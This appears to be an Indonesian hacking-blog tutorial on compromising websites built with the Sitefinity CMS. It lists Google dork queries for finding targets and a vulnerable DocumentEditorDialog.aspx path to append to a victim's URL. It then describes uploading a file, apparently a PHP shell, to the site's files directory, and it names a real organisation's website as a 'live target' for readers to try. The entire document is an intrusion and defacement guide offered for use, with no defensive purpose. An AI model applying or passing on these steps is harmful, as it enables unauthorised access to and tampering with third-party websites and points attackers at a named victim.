Dork :
inurl:"/Sitefinity/login.aspx"
"UserControls/Dialogs"
"Sitefinity: Login"
Sisanya kembangin sendiri ya gan :)
Exploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
1. Dorking
Kalau sudah klik salah satu sitenya gan, salah dua juga gak boleh. Terdapat banyak sekali website yang terlihat tinggal kita klik satu persatu.
2. Exploit webnya
Langkah kedua yaitu kita exploit website yang kita klik tadi ya gan, dengan menambahkan exploitnya di website tersebut gan, /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx pastekan di url website korban. contoh site.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
3. Upload file
Fak sitenya ga vuln, santai gan masih banya ribuan site vuln diluar sana. Oke misal sitenya vuln akses file yang diupload tadi dimana?
Ada di site.com/files/filekamu.php
4. Done
Karena di tutor ini sitenya ga vuln :v gw bagi live target aja http://www.calstart.org Oke gan Jadi ya kurang lebih seperti ini penampakannya website yang sudah diexploit tadi. :D
EmoticonEmoticon